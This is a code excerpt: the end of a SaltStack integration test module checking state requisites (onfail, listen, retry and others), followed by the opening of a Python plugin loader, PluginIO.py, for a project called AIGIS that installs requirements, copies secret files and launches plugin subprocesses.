the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
comment = state_run['cmd_|-e_|-echo e_|-run']['comment']
self.assertEqual(comment, 'State was not run because onfail req did not change')
stdout = state_run['cmd_|-f_|-echo f_|-run']['changes']['stdout']
self.assertEqual(stdout, 'f')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
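# A sketch of what the SLS under test might contain (hypothetical contents
# of retry/retry_defaults.sls; the real fixture ships with the test suite):
#   file_test:
#     file.exists:
#       - name: /path/to/a/non-existent/file.txt
#       - retry:
#           attempts: 2
#           interval: 30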
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attempts
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
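# Illustration of the hashing described above (generic sketch, not
# necessarily the exact helper Salt uses internally):
#   import hashlib
#   cache_name = hashlib.sha1(tag.encode('utf-8')).hexdigest()
# which yields a fixed 40-character name regardless of how long the tag is.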
def _add_runtime_pillar(self, pillar):
'''
helper function to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
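# For example, _add_runtime_pillar(pillar={'test': True}) leaves behind
# (sketch of the generated files in TMP_PILLAR_TREE):
#   pillar.sls:  test: true
#   top.sls:     base:
#                  '*':
#                    - pillar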
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true after the state has already been run
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg after the state has already been run
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
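# A minimal sketch of the pattern under test (hypothetical SLS, not the
# actual issue-30161 fixture): with multiple unless commands, the state
# must only be skipped when *all* of them succeed.
#   unless_test:
#     cmd.run:
#       - name: echo "hello"
#       - unless:
#         - "true"    # succeeds; on its own this would skip the state
#         - "false"   # fails, so the state must still run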
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
PluginIO.py
|
"""
Process AIGIS plugin.
"""
#pylint: disable=import-error
import os
import sys
import time
import shutil
import asyncio
import subprocess
from threading import Thread
from utils import path_utils, mod_utils, exc_utils
from plugins.external.WatchDog import jiii
# Set the dump location for plugin secrets
path_utils.ensure_path_exists(path_utils.SECRET_DUMP)
# Setup the asyncio event loop for subprocess management
ALOOP = asyncio.get_event_loop()
ALOOP_FOREVER = Thread(target=ALOOP.run_forever, daemon=True)
ALOOP_FOREVER.start()
# Max number of seconds to launch a plugin.
PLUGIN_LAUNCH_TIMEOUT = 10
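# Hedged sketch (not part of the original module): with ALOOP running in a
# daemon thread, other threads can hand coroutines to it through
# asyncio.run_coroutine_threadsafe. Nothing in this file calls the helper
# below; it only illustrates the pattern.
def _submit_to_loop(coro, timeout=PLUGIN_LAUNCH_TIMEOUT):
    """Schedule ``coro`` on ALOOP from any thread and wait for its result."""
    future = asyncio.run_coroutine_threadsafe(coro, ALOOP)
    return future.result(timeout=timeout)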
class PluginIO():
"""
Parent class for loading plugins, containing all the logic that is independent of the plugin type.
"""
@classmethod
def load(cls, plugin, manager):
"""
Set up the AIGIS plugin. This means executing the four major steps.
CONTEXTUALIZE
REQUIREMENTS
SECRETS
RUN
:param AigisPlugin plugin: the plugin stored in core, regardless of plugin type.
:param PluginManager manager: this plugin manager singleton
:raises PluginLoadError: for any problem in loading the plugin
"""
try:
cls.contextualize(plugin)
cls.requirements(plugin)
cls.copy_secrets(plugin)
plugin.log.boot("Deploying...")
cls.run(plugin, manager)
except exc_utils.PluginLoadError as e:
plugin.log.error(str(e))
raise
@staticmethod
def contextualize(plugin):
"""
Apply any plugin contextualization that could be needed to the config,
depending on numerous factors.
This is kind of silly, but I'm not sure how to make it better.
:param AigisPlugin plugin: the plugin stored in core
"""
plugin.config.ENTRYPOINT = plugin.config.ENTRYPOINT.format(root=plugin.root)
if hasattr(plugin.config, "REQUIREMENT_FILE"):  # Requirements are not mandatory
    plugin.config.REQUIREMENT_FILE = plugin.config.REQUIREMENT_FILE.format(root=plugin.root)
for secret in plugin.config.SECRETS:
plugin.config.SECRETS[secret] = plugin.config.SECRETS[secret].format(root=plugin.root)
@staticmethod
def requirements(plugin):
"""
Install the requirements for this plugin on the host system, based on the plugin config.
:param AigisPlugin plugin: the plugin stored in core
:raises RequirementError: if requirements are not or cannot be met.
"""
# Check system requirements
for req in plugin.config.SYSTEM_REQUIREMENTS:
if not shutil.which(req):
    raise RequirementError("Fatal error. Host has no %s installed." % req)
try:
subprocess.check_call(
plugin.config.REQUIREMENT_COMMAND.split(" ") + [plugin.config.REQUIREMENT_FILE],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError as e:
raise RequirementError("Requirement install exited with error code %s" % str(e))
except AttributeError:
plugin.log.warning("No requirements provided, attempting to start plugin regardless.")
except Exception as e:
raise RequirementError(
"Could not process requirements %s. The following error occured:\n%s" %
(plugin.config.REQUIREMENT_FILE, str(e))
)
plugin.log.boot("Requirements processed successfully...")
@staticmethod
def copy_secrets(plugin):
"""
Copy any potential secrets a plugin could have from the AIGIS secret dump to the specified location.
Will not copy anything if a file is missing.
:param AigisPlugin plugin: plugin registered in core
:raises MissingSecretFileError: if a specified secret cannot be found.
"""
missing_secrets = []
for secret in plugin.config.SECRETS:
if not os.path.exists(os.path.join(path_utils.SECRET_DUMP, os.path.join(plugin.name, secret))):
missing_secrets.append(os.path.join(
path_utils.SECRET_DUMP,
os.path.join(plugin.name, secret)
))
if not missing_secrets:
for secret in plugin.config.SECRETS:
path_utils.ensure_path_exists(plugin.config.SECRETS[secret])
shutil.copy2(
os.path.join(
path_utils.SECRET_DUMP,
os.path.join(plugin.name, secret)
),
plugin.config.SECRETS[secret]
)
else:
raise MissingSecretFileError(
"The following secret files are missing:\n" + "\n".join(missing_secrets)
)
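# Layout sketch (names illustrative): a secret "db.json" for plugin
# "myplugin" is expected at <SECRET_DUMP>/myplugin/db.json and is copied
# to the destination path configured in plugin.config.SECRETS["db.json"].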
@staticmethod
def run(plugin, manager):
"""
This function launches the plugin following different logic depending on the plugin type
specified in the config.
:param AigisPlugin plugin: plugin to be passed to the WatchDog for external processes
:param PluginManager manager: this instance's PluginManager to be passed to WatchDogs
for external processes
:raises InvalidPluginTypeError: if the plugin type specified in the plugin config is not valid
"""
raise InvalidPluginTypeError("Cannot process plugin type %s." % plugin.config.PLUGIN_TYPE)
@staticmethod
def reload(plugin, manager):
"""
This is exposed as the aigis.AIGISreload function in the aigis core module.
This allows plugins to be reloaded (and potentially updated) without needing to have the "restart"
option selected. Since it's difficult/impossible to crash core plugins as well, this is done from
here.
:param AigisPlugin plugin: the plugin to reload
:param PluginManager manager: the plugin manager singleton
:raises InvalidPluginTypeError: if the plugin type specified in the plugin config is not valid
"""
raise InvalidPluginTypeError(
"Cannot reload plugin %s. Plugin type invalid. How was it loaded to begin with?" % plugin.name
)
@staticmethod
def stop(plugin, manager):
"""
Stop the plugin in as non-violent a way as possible.
Does not handle what kind of retry, if any, is attempted on burial.
:param AigisPlugin plugin: the plugin to stop
:param PluginManager manager: the plugin manager, for burial if needed
"""
class CoreIO(PluginIO):
"""
Plugin loader for the CORE plugin type.
"""
@staticmethod
def run(plugin, manager):
"""
Core implementation of run.
Parses the environment of the core injection file provided by the plugin and integrates the exposed
functionality into the AIGIS Skills core. Functionality is wrapped with an AIGIS log object if the
plugin functions accept it.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
"""
import aigis as core_skills # AigisCore.skills
# We need to add the plugin config's entrypoint to the PYTHONPATH
# so imports work as expected on requirements
sys.path.append(plugin.config.ENTRYPOINT)
core_skills._AIGISlearnskill(
mod_utils.import_from_path(
_prep_core_injector_file(plugin)
),
plugin
)
plugin.log.boot("Skills acquired.")
@staticmethod
def reload(plugin, manager):
"""
Fully kill the core plugin by removing all its references in the core skills object, then request
the manager to reload it.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
"""
plugin.reload = True
CoreIO.stop(plugin, manager)
@staticmethod
def stop(plugin, manager):
"""
Unregister the skills of the core plugin and tell the manager to bury it.
:param AigisPlugin plugin: plugin to stop
:param PluginManager manager: manager singleton for burial
"""
import aigis as core_skills # AigisCore.skills
core_skills._AIGISforgetskill(
mod_utils.import_from_path(
_prep_core_injector_file(plugin)
),
plugin
)
plugin.log.shutdown("Skills deregistered.")
manager.bury(plugin)
class InternalLocalIO(PluginIO):
"""
Plugin loader for the INTERNAL-LOCAL plugin type.
"""
ProxyPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../proxinator/injector/aigis.py"))
@staticmethod
def contextualize(plugin):
"""
Plugin-type specific contextualizer. On top of the usual, internal-local plugins also format the
LAUNCH option with {root}.
:param AigisPlugin plugin: the plugin
"""
PluginIO.contextualize(plugin)
# launch is only a path on internal plugins
plugin.config.LAUNCH = plugin.config.LAUNCH.format(root=plugin.root)
@staticmethod
def run(plugin, manager):
"""
Internal-local implementation of run.
Spawns a subprocess and instantiates that Python environment to include the core_skills singleton,
exposing all the core functionality in the subprocess. Also maintains a watchdog thread that monitors
for the process to exit. The stdout/err of the subprocess is captured and piped to the plugin's log
filehandler.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
:raises PluginLaunchTimeoutError: if plugin fails to launch within the timeout value
"""
core_file = _prep_core_injector_file(plugin)
if core_file:
# We need to add the plugin config's entrypoint to the PYTHONPATH
# so imports work as expected on requirements
sys.path.append(plugin.config.ENTRYPOINT)
import aigis
aigis._AIGISlearnskill(
mod_utils.import_from_path(core_file),
plugin
)
plugin.log.boot("Internal plugin registered skills...")
tmp_loop = asyncio.new_event_loop()
tmp_loop.run_until_complete(InternalLocalIO._run_internal(plugin))
plugin.log.boot("Running...")
Thread(target=_threaded_async_process_wait, args=(plugin, manager, tmp_loop), daemon=True).start()
@staticmethod
def reload(plugin, manager):
"""
Reload an internal plugin by setting its reload flag and killing the process.
Realistically, this may not be safe for all plugins. It is up to the user to use it responsibly.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
:raises AttributeError: if the plugin has no internal process attached to it
"""
plugin.reload = True
try:
plugin._ext_proc.kill()
except AttributeError as e:
raise AttributeError("Missing internal process for plugin %s. A reload request was made when the"
"plugin wasn't active.") from e
@staticmethod
async def _run_internal(plugin):
"""
Launch an asyncio subprocess.
:param AigisPlugin plugin: the plugin
"""
plugin._ext_proc = await asyncio.create_subprocess_exec(
*[
sys.executable,
InternalLocalIO.ProxyPath,
"--ENTRYPOINT", plugin.config.ENTRYPOINT,
"--LAUNCH", plugin.config.LAUNCH
],
stdout=plugin.log.filehandler,
stderr=plugin.log.filehandler
)
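# The spawned command line is equivalent to (paths illustrative):
#   <sys.executable> .../proxinator/injector/aigis.py \
#       --ENTRYPOINT <plugin entrypoint> --LAUNCH <plugin launch path>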
@staticmethod
def stop(plugin, manager=None):
"""
Stop the plugin in as non-violent a way as possible.
Killing the plugin will automatically cause the manager to bury it, so no need to do so manually.
:param AigisPlugin plugin: the plugin to stop
:param PluginManager manager: unused, but required by parent
"""
_stop(plugin)
class InternalRemoteIO(PluginIO):
"""
Launch an internal plugin on a remote host
"""
# TODO
class ExternalIO(PluginIO):
"""
Plugin loader for the EXTERNAL plugin type.
"""
@staticmethod
def run(plugin, manager):
"""
External plugin implementation of run.
Spawns a new process using the plugin's configuration to launch the external application as an
independent program. It does however maintain a watchdog thread that watches for that process to
